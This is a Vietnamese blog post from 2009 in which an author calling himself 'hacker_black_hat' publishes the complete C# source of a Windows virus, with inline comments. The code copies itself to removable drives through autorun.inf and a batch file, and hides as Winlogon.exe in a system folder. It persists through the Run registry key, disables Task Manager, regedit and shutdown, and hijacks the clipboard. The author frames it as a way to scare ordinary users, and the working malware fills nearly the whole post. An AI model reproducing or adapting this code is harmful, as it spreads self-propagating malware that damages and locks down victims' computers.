Trao đổi với tôi

www.hdphim.info

12/28/09

[Virus] Virus viết bằng C#

Author: hacker_black_hat

Đã 1 tuần trôi qua, hum nay hacker tui xin mạo muội post bài này lên để giải thích đôi chút về con virus đã post lên tuần trước Trước tiên chung ta cần điểm lại 1 chút về ngôn ngữ C#.
// Đây là chú thích theo dòng
/* Đây là chú thích theo khối
*/
Các bạn có thể thấy rất giống C++, điều đó là dễ hiểu bởi C# còn được gọi là C++++ mà.
Còn các vòng for, do .. while, while. Điều kiện : if else thi van dc giữ nguyên
Các tính năng kỹ thuật:
  1. Ẩn taskmanager
  2. Ko cho shutdown
  3. Khi copy và paste thì chỉ hiện ra dòng chữ : Hacked by hacker_black_hat
  4. Tìm kiếm USB và thâm nhập
  5. Khởi động cùng Windows

Chỉ với bằng ấy tính năng cũng đủ làm cho những người có trinh độ tin học bình thường thấy hoảng rùi. he he...

Chỉ có 1 hạn chế lớn nhất của con virus này là chỉ hoạt động dc trên máy tính có cài .NET farmework
Sau đây là toàn bộ đoạn code cua con virus:
//Mấy câu lệnh này giống như #include của C++ thui

using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using Microsoft.Win32;
using System.IO;

//////////////////////////////////////////
// Bao toàn bộ đoạn mã là 1 namespace
namespace Virus
{
public partial class Form1 : Form
{
//Khai biến của các đường dẫn để sử dung trong toàn bộ chương trình
public string path_sys ,filename,path_cur ;
///////////////////////////////
public Form1()
{
InitializeComponent();
}
// Khi chương trình dc kích hoạt thì đoạn mã này sẽ đc chạy đầu tiên
// may cau lenh nay chi dung de lay ten cua file ma thui

private void Form1_Load(object sender, EventArgs e)
{
string file_path2, file_path3, file_path4;
path_sys = @"C:\WINDOWS\pchealth\";
path_cur = Convert.ToString(System.IO.Directory.GetCurrentDirectory()) + @"\";

file_path2 = path_cur + "Bkav.exe";
file_path3 = path_cur + "Winlogon.exe";
file_path4 = path_cur + "Virus.exe";

if (System.IO.File.Exists(file_path2))
filename = "Bkav.exe";

if (System.IO.File.Exists(file_path3))
filename = "Winlogon.exe";

if (System.IO.File.Exists(file_path4))
filename = "Virus.exe";

}

////////////////////////////////////////////////////////////////////////////////
private void timer1_Tick(object sender, EventArgs e)
{


// An chuong trinh
// Dong mã này sẽ gọi 1 hàm an chuong trinh va thực thi nó
an_programe();
//////////////////////////////////
// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
///////////////////////////////////////////////////////
// Kiem tra xem chuong trinh co o trong USB hay ko?
string get_disk, get_usb_path;
get_disk = Convert.ToString(System.IO.Path.GetPathRoot(path_cur));
get_usb_path = path_cur + @"\Bkav.exe";
if (get_disk == @"F:\")
{
try
{// Tao 1 file autorun trong USB
AutorunFile(@"F\");
autorunbat(@"F:\");
if (!System.IO.Directory.Exists(path_sys + @"Winlogon.exe"))
{
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Normal);
System.IO.File.Copy(get_usb_path, path_sys + @"Winlogon.exe");
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Hidden );
}

}
catch( Exception a)
{

}

}

if (get_disk == @"H:\")
{
try
{// Tao 1 file autorun trong USB
AutorunFile(@"H:\");
autorunbat(@"H:\");
if (!System.IO.Directory.Exists(path_sys + @"Winlogon.exe"))
{
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Normal);
System.IO.File.Copy(get_usb_path, path_sys + @"Winlogon.exe");
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Hidden);
}

}
catch (Exception a)
{
}

}
if (get_disk == @"G:\")
{
try
{// Tao 1 file autorun trong USB
AutorunFile(@"G:\");
autorunbat(@"G:\");
if (!System.IO.Directory.Exists(path_sys + @"Winlogon.exe"))
{
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Normal);
System.IO.File.Copy(get_usb_path, path_sys + @"Winlogon.exe");
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Hidden);
}

}
catch (Exception a)
{
}

}
if (get_disk == @"I:\")
{
try
{// Tao 1 file autorun trong USB
AutorunFile(@"I:\");
autorunbat(@"I:\");
if (!System.IO.Directory.Exists(path_sys + @"Winlogon.exe"))
{
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Normal);
System.IO.File.Copy(get_usb_path, path_sys + @"Winlogon.exe");
System.IO.File.SetAttributes(get_usb_path, FileAttributes.Hidden);
}

}
catch (Exception a)
{
}


}
//Ket thuc phan xu ly truong trinh chay trong USB
//////////////////////////////////////////////////////////////////////
// di chuyen file vao folder he thong
if (path_cur != path_sys)
{
di_chuyen_file();

}


//////////////////////////////////////////////////
// Phat hien USB va copy file vao USB
//********************************
try
{
if ((!System.IO.Directory.Exists(@"F:\Bkav.exe")) || (!System.IO.Directory.Exists(@"F:\autorun.inf")) || (!System.IO.Directory.Exists(@"F:\USB Manager.bat")))
{
AutorunFile(@"F:\");
autorunbat(@"F:\");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
System.IO.File.Copy(path_cur + filename, @"F:\Bkav.exe");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Hidden);
System.IO.File.SetAttributes(@"F:\Bkav.exe", FileAttributes.Hidden);
}

}
catch (Exception a)
{// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
}
//********************************
try
{

if ((!System.IO.Directory.Exists(@"H:\Bkav.exe")) || (!System.IO.Directory.Exists(@"H:\autorun.inf")) || (!System.IO.Directory.Exists(@"H:\USB Manager.bat")))
{
AutorunFile(@"H:\");
autorunbat(@"H:\");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
System.IO.File.Copy(path_cur + filename, @"H:\Bkav.exe");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Hidden);
System.IO.File.SetAttributes(@"H:\Bkav.exe", FileAttributes.Hidden);
}
}
catch ( Exception a)
{
// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
}
//********************************
try
{

if ((!System.IO.Directory.Exists(@"G:\Bkav.exe")) || (!System.IO.Directory.Exists(@"G:\autorun.inf")) || (!System.IO.Directory.Exists(@"G:\USB Manager.bat")))
{
AutorunFile(@"G:\");
autorunbat(@"G:\");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
System.IO.File.Copy(path_cur + filename, @"G:\Bkav.exe");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Hidden);
System.IO.File.SetAttributes(@"G:\Bkav.exe", FileAttributes.Hidden);
}
}
catch ( Exception a)
{
// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
}
//********************************
try
{
if ((!System.IO.Directory.Exists(@"I:\Bkav.exe")) || (!System.IO.Directory.Exists(@"I:\autorun.inf")) || (!System.IO.Directory.Exists(@"I:\USB Manager.bat")))
{
AutorunFile(@"I:\");
autorunbat(@"I:\");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
System.IO.File.Copy(path_cur + filename, @"I:\Bkav.exe");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Hidden);
System.IO.File.SetAttributes(@"I:\Bkav.exe", FileAttributes.Hidden);
}


}
catch (Exception a)
{
// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);

}
//*******************************

////////////////////////////////////////////////////
// Mac dinh text cho Clipboard
try
{
if (Convert.ToString(Clipboard.GetText()) != "Hacked by hacker_black_hat")
Clipboard.SetText("Hacked by hacker_black_hat");
}
catch (Exception a)
{
}
/////////////////////////////////////////////////////

//************an task manager va regedit
int dieukien1;
dieukien1 = an_task_regedit();

if (dieukien1 == 0)
{
RegistryKey hkcu = Registry.CurrentUser;
RegistryKey cusoftware = hkcu.OpenSubKey("Software", true);
RegistryKey cumicrosoft = cusoftware.OpenSubKey("Microsoft", true);
RegistryKey cuwindows = cumicrosoft.OpenSubKey("Windows", true);
RegistryKey cucurrentversion = cuwindows.OpenSubKey("CurrentVersion", true);
RegistryKey cupolicies = cucurrentversion.OpenSubKey("Policies", true);
RegistryKey cuexplorer = cupolicies.OpenSubKey("Explorer", true);
// khong cho shutdown
cuexplorer.SetValue("NoClose", "1");
RegistryKey cusystem = cupolicies.CreateSubKey("System");
// Tat taskmanager va regedit
cusystem.SetValue("DisableRegistryTools", "1");
cuexplorer.SetValue("DisableRegistryTools", "1");
cusystem.SetValue("DisableTaskMgr", "1");
cusystem.Close();
cuexplorer.Close();

}

//////////////////////////////////////////////////////////////

// khoi dong cung windows

int dieukien2;
dieukien2 = khoi_dong_cung_win();
if (dieukien2 == 0)
{
//Dang ky khoi dong cung windows
RegistryKey hklm = Registry.LocalMachine;
RegistryKey hksoftware = hklm.OpenSubKey("Software", true);
RegistryKey hkmicrosoft = hksoftware.OpenSubKey("Microsoft", true);
RegistryKey hkwindows = hkmicrosoft.OpenSubKey("Windows", true);
RegistryKey hkcurrentversion = hkwindows.OpenSubKey("CurrentVersion", true);
RegistryKey hkrun = hkcurrentversion.OpenSubKey("Run", true);
hkrun.SetValue(" Winlogon ", path_sys + @"Winlogon.exe");
hkrun.Close();

}
////////////////////////////////////////////////////////////
// An file exe
System.IO.File.SetAttributes(path_cur + filename, System.IO.FileAttributes.Hidden);

}

public void an_programe()
{
this.SetVisibleCore(false);
this.Visible = false;
this.Hide();

}

public void AutorunFile(string AutorunPath)
{
string autopath;
autopath =AutorunPath + @"autorun.inf";
try
{
if (!Directory.Exists(autopath))
{
StreamWriter mystream = new StreamWriter(autopath);
mystream.WriteLine("[autorun]");
mystream.WriteLine("open=Bkav.exe"); mystream.WriteLine(@"icon=Bkav.ico");
mystream.Close();
System.IO.File.SetAttributes(AutorunPath + @"autorun.inf", System.IO.FileAttributes.Hidden);
}
}
catch (Exception a)
{

}
}
public void autorunbat(string batpath)
{
string bat_path;
bat_path = batpath + @"USB Manager.bat";
try
{
if (!Directory.Exists(bat_path))
{
StreamWriter mystream = new StreamWriter(bat_path);
mystream.WriteLine("@echo Loading CD");
mystream.WriteLine("@start Bkav.exe");
mystream.WriteLine("@cls");
mystream.WriteLine("@exit");
mystream.Close();

}
}
catch (Exception a)
{
}

}

public void di_chuyen_file()
{
path_sys = @"C:\WINDOWS\pchealth\";
path_cur = Convert.ToString(System.IO.Directory.GetCurrentDirectory()) + @"\";
try
{
if (!System.IO.Directory.Exists(path_sys + @"Winlogon.exe"))
{

System.IO.File.Copy(path_cur + filename, path_sys + @"Winlogon.exe");
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Hidden);
System.IO.File.SetAttributes(path_sys + @"Winlogon.exe", FileAttributes.Hidden);
}
}

catch (Exception af)
{
// Cho Virus hien hinh
System.IO.File.SetAttributes(path_cur + filename, FileAttributes.Normal);
}

}

public int khoi_dong_cung_win()
{

//Dang ky khoi dong cung windows
RegistryKey hklm = Registry.LocalMachine;
RegistryKey hksoftware = hklm.OpenSubKey("Software");
RegistryKey hkmicrosoft = hksoftware.OpenSubKey("Microsoft");
RegistryKey hkwindows = hkmicrosoft.OpenSubKey("Windows");
RegistryKey hkcurrentversion = hkwindows.OpenSubKey("CurrentVersion");
RegistryKey hkrun = hkcurrentversion.OpenSubKey("Run");
try
{
string a;
a = Convert.ToString(hkrun.GetValue(" Winlogon "));
if (a != (path_sys + @"Winlogon.exe"))
return 0;
hkrun.Close();
}
catch (Exception e)
{
hkrun.Close();
return 0;

}

// Mac dinh reutrn la : 1
return 1;
}


public int an_task_regedit()
{

RegistryKey hkcu = Registry.CurrentUser;
RegistryKey cusoftware = hkcu.OpenSubKey("Software", true);
RegistryKey cumicrosoft = cusoftware.OpenSubKey("Microsoft", true);
RegistryKey cuwindows = cumicrosoft.OpenSubKey("Windows", true);
RegistryKey cucurrentversion = cuwindows.OpenSubKey("CurrentVersion", true);
RegistryKey cupolicies = cucurrentversion.OpenSubKey("Policies", true);
RegistryKey cuexplorer = cupolicies.OpenSubKey("Explorer", true);
RegistryKey cusystem = cupolicies.CreateSubKey("System");
try
{
int a, b, c;
a = Convert.ToInt32(cusystem.GetValue("DisableTaskMgr"));
b = Convert.ToInt32(cuexplorer.GetValue("Noclose"));
c = Convert.ToInt32(cusystem.GetValue("DisableRegistryTools"));
cusystem.Close();
cuexplorer.Close();
if (a != 1) return 0;
if (b != 1) return 0;
if (c != 1) return 0;
}
catch (Exception e)
{
return 0;
}
// Mac dinh return la : 1
return 1;
}}
}


RefLink: http://dtvt.org/dtvt.asp?TID=5395

No comments:

Post a Comment